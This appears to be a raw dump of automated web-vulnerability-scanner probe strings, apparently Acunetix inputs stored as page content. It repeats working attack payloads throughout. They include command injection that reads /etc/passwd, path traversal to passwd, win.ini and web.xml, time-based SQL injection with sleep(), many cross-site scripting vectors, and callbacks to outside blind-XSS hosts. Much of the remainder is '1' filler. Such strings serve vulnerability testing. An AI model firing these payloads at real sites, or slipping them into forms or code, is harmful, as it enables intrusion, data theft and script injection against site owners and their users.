`cat /etc/passwd`

1

1

1

1

(select(0)from(select(sleep(6.5)))v)/*'+(select(0)from(select(sleep(6.5)))v)+'"+(select(0)from(select(sleep(6.5)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(910600)>

${99363+99634}

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

-1

1<img src=xyz OnErRor=prompt(912636)>

1

1

1&n917602=v987500

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1<img/src=">" onerror=alert(997293)>

1

)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

-1))

1<ScRiPt%20>prompt(938116)</sCripT>

'"()

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

testasp.vulnweb.com

l84MAXXv'

1

1

^(#$!@#$)(()))******

1

1

\xf6<img acu onmouseover=prompt(903224) //\xf6>

'

59barmaH')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1

1<input autofocus onfocus=prompt(999784)>

1

CrHlXBVv'))

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

"

1

<a href='http://www.acunetix.com'>website security</a>

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

http://hitA6RX6PxScn.bxss.me/

||cat /etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1_4ovDq <ScRiPt >prompt(936719)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

-1))

comments

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

KbMli6Sp'

1

&dir

http://www.acunetix.tst

comments

1

'"

1

ovkyBXYp')

1'"()&%<ScRiPt >prompt(972172)</ScRiPt>

1

<!--

comments/.

1

1

kjTKRNg4'))

1

1

1

'"()&%<ScRiPt >prompt(947733)</ScRiPt>

file:///etc/passwd

'&dir&'

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1_915986

1

1

WEB-INF/web.xml

|dir

1

1

1

WEB-INF\web.xml

'|dir

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

acu5330\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5330

../../../../../../../../../../boot.ini

1

acux6672\xc0\xbez1\xc0\xbcz2a\x90bcxuca6672

1

1<ScRiPt >prompt(993380)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(980427)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(987055)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?962541></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(932390)</ScRiPt>

response.write(9097148*9069905)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(996744)">

1

1

1

1

'+response.write(9097148*9069905)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(978034)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

"+response.write(9097148*9069905)+"

&cat /etc/passwd&

1

1

1<div style=width:expression(prompt(912881))>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

'&cat /etc/passwd&'

1

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

"&cat /etc/passwd&"

1

1<body onload=prompt(988498)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

${100168+99131}

WEB-INF\web.xml

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986613)>

cat /etc/passwd

-1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<img src=xyz OnErRor=prompt(948254)>

`cat /etc/passwd`

-1)

1

1some_inexistent_file_with_long_name%00.jpg

1&n931380=v997473

)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

-1))

1

1<img/src=">" onerror=alert(938157)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

'"()

1

1<ScRiPt%20>prompt(920144)</sCripT>

nMxpk7C8'

testasp.vulnweb.com

^(#$!@#$)(()))******

1

gzt9oJUA')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1&lt

1

1

1

zXSBaKYO'))

1

1

\xf6<img acu onmouseover=prompt(934708) //\xf6>

'

1

/etc/passwd

1

1

'

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(944021)>

"

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

-1)

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

http://hitkOFsTyHbDm.bxss.me/

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

1

1

acunetix_wvs_invalid_filename

1

1

&dir

i7mVAZCC'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

UmfE4rF3')

comments

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1_8flI1 <ScRiPt >prompt(943090)</ScRiPt>

comments

'"

1

I5x1QTQV'))

1

file:///etc/passwd

1

"&dir&"

1

comments/.

<!--

1

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(987617)</ScRiPt>

1

|dir

1

1

1

'"()&%<ScRiPt >prompt(944327)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1_973041

'|dir

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu8113\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8113

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acux10774\xc0\xbez1\xc0\xbcz2a\x90bcxuca10774

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(924041)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<script>prompt(909230)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(962151)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958786></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

response.write(9684689*9169918)

1<ScRiPt >prompt(941281)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(960069)">

'+response.write(9684689*9169918)+'

WEB-INF/web.xml

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969912)"></g></svg>

"+response.write(9684689*9169918)+"

1

WEB-INF\web.xml

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(928162))>

1

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1<body onload=prompt(943697)>

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

if(now()=sysdate(),sleep(9.423),0)/*'XOR(if(now()=sysdate(),sleep(9.423),0))OR'"XOR(if(now()=sysdate(),sleep(9.423),0))OR"*/

`cat /etc/passwd`

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(971004)>

1

${99552+99418}

1

1

|cat /etc/passwd#

(select(0)from(select(sleep(9.423)))v)/*'+(select(0)from(select(sleep(9.423)))v)+'"+(select(0)from(select(sleep(9.423)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=xyz OnErRor=prompt(991070)>

1

1

1

'|'ld

1&n933678=v949387

-1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1

1<img/src=">" onerror=alert(904196)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1

"|"ld

1

/etc/passwd

-1))

1<ScRiPt%20>prompt(908789)</sCripT>

!(()&&!|*|*|

1

testasp.vulnweb.com

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'"()

zHHpBSvI'

1

1&lt

^(#$!@#$)(()))******

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

1

1

jxEbZCRt')

'

1

1

\xf6<img acu onmouseover=prompt(998357) //\xf6>

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

1

1

1

t9O47KTU'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<input autofocus onfocus=prompt(914439)>

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

1

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

file:///etc/passwd

<a href='http://www.acunetix.com'>website security</a>

http://hite5Ix2UWMBi.bxss.me/

acunetix_wvs_invalid_filename

&dir

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

[url=http://www.acunetix.com]website security[/url]

comments

/\../\../\../\../\../\../\../etc/passwd

1

-1))

1

'&dir&'

1

1

1

1_AKpKT <ScRiPt >prompt(959832)</ScRiPt>

WEB-INF/web.xml

comments

http://www.acunetix.tst

lFgVNcy4'

1

'"

1'"()&%<ScRiPt >prompt(962010)</ScRiPt>

"&dir&"

1

comments/.

WEB-INF\web.xml

1

8VTa8uTD')

1

1

<!--

1

'"()&%<ScRiPt >prompt(939422)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

|dir

1

Fie65iA5'))

1

1

1

1

1_929197

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

acu4940\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4940

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

acux3469\xc0\xbez1\xc0\xbcz2a\x90bcxuca3469

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(971159)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<script>prompt(969329)</script>

1

1

1

1

1

1<ScRiPt >prompt(959759)</ScRiPt>

WEB-INF/web.xml

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900991></ScRiPt>

1

1

WEB-INF\web.xml

1

1

response.write(9510271*9694827)

1<ScRiPt >prompt(929157)</ScRiPt>

1

1

1

1

1

'+response.write(9510271*9694827)+'

1<video><source onerror="javascript:prompt(942667)">

1

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901777)"></g></svg>

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

"+response.write(9510271*9694827)+"

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(972947))>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

${100277+99372}

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

cat /etc/passwd

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

1

if(now()=sysdate(),sleep(6.22),0)/*'XOR(if(now()=sysdate(),sleep(6.22),0))OR'"XOR(if(now()=sysdate(),sleep(6.22),0))OR"*/

1

1<body onload=prompt(990983)>

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1&n961181=v953561

`cat /etc/passwd`

(select(0)from(select(sleep(6.22)))v)/*'+(select(0)from(select(sleep(6.22)))v)+'"+(select(0)from(select(sleep(6.22)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983312)>

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(917442)>

testasp.vulnweb.com

!(()&&!|*|*|

1

1

-1)

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

1<img/src=">" onerror=alert(931436)>

1

'"()

^(#$!@#$)(()))******

1

"|"ld

-1))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"

1<ScRiPt%20>prompt(904973)</sCripT>

1

1

1

1

6mLzKAxt'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1&lt

${@print(md5(acunetix_wvs_security_test))}

1

1

1

\xf6<img acu onmouseover=prompt(910929) //\xf6>

'

1

O39rp6Yx')

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(933725)>

1

http://hitvWAp1LawLl.bxss.me/

dZyGH1NY'))

1

acunetix_wvs_invalid_filename

"

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

-1

comments

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

http://www.acunetix.tst

-1)

comments

[url=http://www.acunetix.com]website security[/url]

1'"()&%<ScRiPt >prompt(951404)</ScRiPt>

'"

1

1

-1))

<!--

1_okMeo <ScRiPt >prompt(904418)</ScRiPt>

1

comments/.

'"()&%<ScRiPt >prompt(951653)</ScRiPt>

||cat /etc/passwd

1

file:///etc/passwd

1

dvyvXZQf'

1

1

1

1_998878

&dir

/\../\../\../\../\../\../\../etc/passwd

1

0vro3xhy')

1

1

1

1

'&dir&'

WEB-INF/web.xml

S9SwmgqQ'))

1

"&dir&"

WEB-INF\web.xml

1

1

1

|dir

../../../../../../../../../../windows/win.ini

acu7887\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7887

1

1

1

acux8500\xc0\xbez1\xc0\xbcz2a\x90bcxuca8500

'|dir

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(923858)</ScRiPt>

"|dir

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(966951)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(985281)</ScRiPt>

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917480></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(972887)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(946750)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934664)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9291128*9157018)

1

1

1<div style=width:expression(prompt(933470))>

1

'+response.write(9291128*9157018)+'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

1<iframe src='data:text/html

1

1

"+response.write(9291128*9157018)+"

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(921363)>

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(938273)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<img src=xyz OnErRor=prompt(925466)>

WEB-INF\web.xml

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img/src=">" onerror=alert(914146)>

1

1

`cat /etc/passwd`

1

1

-1

1

${99417+99695}

1<ScRiPt%20>prompt(968082)</sCripT>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

1

1&n918702=v977231

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1))

1some_inexistent_file_with_long_name%00.jpg

)

'|'ld

1

\xf6<img acu onmouseover=prompt(992398) //\xf6>

1

1

ghQJbuXe'

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

'"()

1<input autofocus onfocus=prompt(950282)>

LlI1w9nr')

testasp.vulnweb.com

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

'

zgt8NoVs'))

1

1

"

1

'

1

[url=http://www.acunetix.com]website security[/url]

1

/etc/passwd

-1

1

"

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1_7RjNS <ScRiPt >prompt(909019)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1)

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1

1

1

1

1

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

1

1

http://hitHsJg0zZax8.bxss.me/

acunetix_wvs_invalid_filename

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

aUEGEgaY'

1

1

comments

1

'&dir&'

1

7iQYP9FS')

1

http://www.acunetix.tst

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

"&dir&"

'"

1

XVV95Q8s'))

1

1'"()&%<ScRiPt >prompt(922803)</ScRiPt>

file:///etc/passwd

1

comments/.

<!--

1

1

1

|dir

1

1

'"()&%<ScRiPt >prompt(991744)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1_993340

'|dir

1

WEB-INF/web.xml

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu10902\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10902

1

1

................windowswin.ini

acux4490\xc0\xbez1\xc0\xbcz2a\x90bcxuca4490

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(952273)</ScRiPt>

1

1

response.write(9563278*9720104)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<script>prompt(964167)</script>

'+response.write(9563278*9720104)+'

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1<ScRiPt >prompt(972339)</ScRiPt>

"+response.write(9563278*9720104)+"

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'&cat /etc/passwd&'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?935890></ScRiPt>

1

1

1

1

1

1<ScRiPt >prompt(948461)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9.045),0)/*'XOR(if(now()=sysdate(),sleep(9.045),0))OR'"XOR(if(now()=sysdate(),sleep(9.045),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1<video><source onerror="javascript:prompt(940938)">

1

1

1

cat /etc/passwd

WEB-INF/web.xml

(select(0)from(select(sleep(9.045)))v)/*'+(select(0)from(select(sleep(9.045)))v)+'"+(select(0)from(select(sleep(9.045)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933345)"></g></svg>

${99119+99007}

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF\web.xml

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<div style=width:expression(prompt(909782))>

`cat /etc/passwd`

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1&n950513=v975002

1

../../../../../../../../../../etc/passwd.jpg

1

1

1<iframe src='data:text/html

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<body onload=prompt(961918)>

boHjF5rv'

testasp.vulnweb.com

'|'ld

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

E7X3y9Eq')

!(()&&!|*|*|

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(962887)>

"|"ld

1

Pa7I5DtP'))

'

'"()

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

1<img src=xyz OnErRor=prompt(924037)>

1

"

-1

1

1

1

1<img/src=">" onerror=alert(954436)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1)

${@print(md5(acunetix_wvs_security_test))}

'

1

1

1

1

-1))

1

1<ScRiPt%20>prompt(957118)</sCripT>

${@print(md5(acunetix_wvs_security_test))}\

/etc/passwd

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

http://hitYERD5C1XK7.bxss.me/

1

m6GZfEGo'

1&lt

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1

cRyPIJjE')

\xf6<img acu onmouseover=prompt(965149) //\xf6>

1

1

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

iOLgERPq'))

1<input autofocus onfocus=prompt(943809)>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

1

'&dir&'

http://www.acunetix.tst

<a href='http://www.acunetix.com'>website security</a>

1

'"

1'"()&%<ScRiPt >prompt(926568)</ScRiPt>

1

comments/.

1

1

"&dir&"

[url=http://www.acunetix.com]website security[/url]

'"()&%<ScRiPt >prompt(940442)</ScRiPt>

<!--

file:///etc/passwd

1

1

1

1_U6ttn <ScRiPt >prompt(969659)</ScRiPt>

1_979655

1

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

1

1

1

1

'|dir

WEB-INF/web.xml

1

1

WEB-INF\web.xml

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

acu9549\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9549

1

1

acux7834\xc0\xbez1\xc0\xbcz2a\x90bcxuca7834

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(915723)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(991419)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(900636)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987405></ScRiPt>

1

1

1

1<ScRiPt >prompt(974308)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(990703)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9437051*9687892)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939061)"></g></svg>

'+response.write(9437051*9687892)+'

1

1

1<div style=width:expression(prompt(998961))>

"+response.write(9437051*9687892)+"

WEB-INF/web.xml

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(987146)>

WEB-INF\web.xml

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

